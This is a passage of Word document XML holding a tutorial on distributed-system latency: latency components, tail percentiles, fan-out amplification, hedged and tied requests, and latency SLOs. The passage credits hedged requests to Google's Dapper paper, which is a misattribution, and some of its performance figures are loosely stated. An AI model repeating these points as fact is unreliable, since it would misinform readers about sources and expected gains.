    <w:p w14:paraId="2D38DCFC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="798269C3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Processing Time:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B206337" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  CPU time for computation (algorithm execution, data transformation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448AF4BF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Memory access time (cache hits + cache misses × miss penalty)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DC0CF8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Disk I/O time (for disk-bound operations)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EA47CF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D18F23" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Queuing Time:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796D21BB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Time waiting in application thread pool queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB3F1FA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Time waiting for database connection pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1456E528" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Time waiting for rate limiter permits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A1E122" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Time waiting for downstream service to have capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3146B8A2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0125EC2F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Network Time:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E26592" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Propagation delay (speed of light × distance)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565F691B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Transmission delay (packet size / link bandwidth)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255018B3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Queuing delay (packets waiting in network router queues)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD04BC5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Retransmission delay (TCP retransmit on packet loss)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF775A5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096913CF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Serialization Time:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F29B003" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Time to encode request to bytes (JSON marshaling, Protobuf encoding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D522554" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Time to decode bytes to objects (deserialization)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736ED0DE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A real example — HTTP API call decomposition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4FCE2E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A5AC86" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Client sends request to remote API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D88D95" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  DNS resolution:        1-50ms   (0 if cached)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BC858B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  TCP handshake:         1 RTT    (10-150ms depending on distance)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5BD501" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  TLS handshake:         1 RTT    (10-150ms, 0 for resumed sessions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0740FB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Request serialization: 0.1-2ms  (JSON encoding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6354D12C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Network transmission:  size/bandwidth (negligible for small requests)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E965B7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Server queue wait:     0-∞ms    (depends on server load)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF00A6D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Server processing:     1-1000ms (the actual work)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CCD57C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Response serialization:0.1-5ms  (JSON encoding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B26C060" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Response transmission: size/bandwidth (1MB response at 100Mbps = 80ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AF03E9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Response propagation:  same as request RTT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D35BDBC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Response deserialization: 0.1-5ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BCC90F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="727A36A3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Total: sum of all components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558F0486" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The dominant component shifts with load:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAD6583" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>At low load: processing time dominates. The queue is empty, the server starts immediately. At medium load: queuing time grows (Little's Law — more concurrent requests, more wait). At high load: queuing time dominates. Processing time is unchanged but wait time is 10× processing time. At very high load: cascading effects — queue fills, requests timeout, retries amplify load further.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191C54D1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tail Latency — The Most Important Latency Metric</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEEA3EC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why p50 is almost meaningless:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5413984F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>The median (p50) latency is the latency that 50% of requests are faster than. At p50 = 10ms, half of users experience &lt;10ms and half experience &gt;10ms. For a service handling 1,000 RPS, 500 users/second experience worse than the median — not a small number.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC6E70B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why p99 and p999 are what matter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9A4A63" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D24BD69" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>At 1,000 RPS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65835250" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  p50  = 10ms: 500 users/second wait longer than this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F9B9D9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  p95  = 50ms: 50 users/second wait longer than this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5BC485" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  p99  = 100ms: 10 users/second wait longer than this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678F2AE9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  p999 = 500ms: 1 user/second waits longer than this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6E0B93" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  p9999= 2000ms: 1 user/10 seconds waits longer than this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABF0BEC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="3E3950F3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>For a user making 10 API calls per page load:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E3498D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Probability of hitting p99 on at least one call: 1 - (0.99)^10 = 9.6%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258986CF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Probability of hitting p99 on at least one call if 100 calls: 1 - (0.99)^100 = 63%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28056BD9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73072398" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>"The 1-in-100 bad request" is experienced by nearly every user loading a page with 100 resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ED6E29" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fan-out amplification of tail latency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A8031E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>This is the most critical insight about tail latency in distributed systems. A system making parallel calls to N backends:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268C8937" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7878CB6F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>P(overall latency &gt; T) = 1 - P(all N calls complete within T)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2153F7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">                       = 1 - P(single call &lt; T)^N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129F0147" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="7900AC66" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>If p99 of a single backend call is 100ms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E2BA52" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  1 backend:   1% of requests exceed 100ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A12999A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  10 backends: 1 - 0.99^10 = 9.6% of requests exceed 100ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369BA387" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  100 backends: 1 - 0.99^100 = 63% of requests exceed 100ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDD522E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="44A663E9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>What was a p99 problem becomes a p37 problem (majority of requests).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E53BA23" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Every microservice call fan-out amplifies tail latency.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> A service making 10 parallel downstream calls experiences 10× the tail latency probability. A service making 100 parallel calls (common in search, recommendation, aggregation services) effectively turns p99 into p37 — the majority of user requests experience "worst-case" latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D18980C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The hedged request pattern — fighting tail latency with redundancy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238DDB34" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Google's Dapper paper introduced </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hedged requests</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> (also called redundant requests or speculative execution): after a request exceeds a threshold (e.g., the 95th percentile latency), send the same request to a second server in parallel. Use whichever response arrives first. Cancel the slower request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141F2160" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09501E4B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Send request to Server A at t=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A6E27C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>At t=p95_latency (e.g., 20ms): send same request to Server B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4B9493" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>If Server A responds first: use A's response, cancel B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208FA9F7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>If Server B responds first: use B's response, cancel A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4278250C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="16321FAB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Effect:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF5A296" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  If Server A is slow (the 5% case), Server B likely responds quickly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396B2890" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Overall tail latency = max(p50 latency, p50 latency of hedge) ≈ p50 latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFFEE82" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Cost: ~5% additional load (hedge requests for the 5% of slow original requests)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6DD509" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Benefit: p99 latency approaches p50 latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F926BA5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The cost is well-bounded:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Only requests exceeding the threshold generate a hedge. If the threshold is p95, only 5% of requests generate hedges — 5% additional load eliminates 94% of tail latency. This is an excellent trade-off when p99 latency matters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F388DAF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The tied request variant:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Send to two servers simultaneously from the start, but each server notifies the other when it starts processing. The first server to start processing sends a "cancel" to the second. This reduces duplicated work while still providing the tail latency benefit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A025E7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Latency SLOs and Error Budgets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DAD2A8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The SLO (Service Level Objective) framework:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D0324C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C268174" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Example SLOs for a payment API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C40EB93" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  p50 &lt; 50ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219A353B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  p95 &lt; 200ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F8CF35" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  p99 &lt; 500ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B31F5A0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  p999 &lt; 2000ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A8DF00" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Availability &gt; 99.95% (error rate &lt; 0.05%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47800826" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
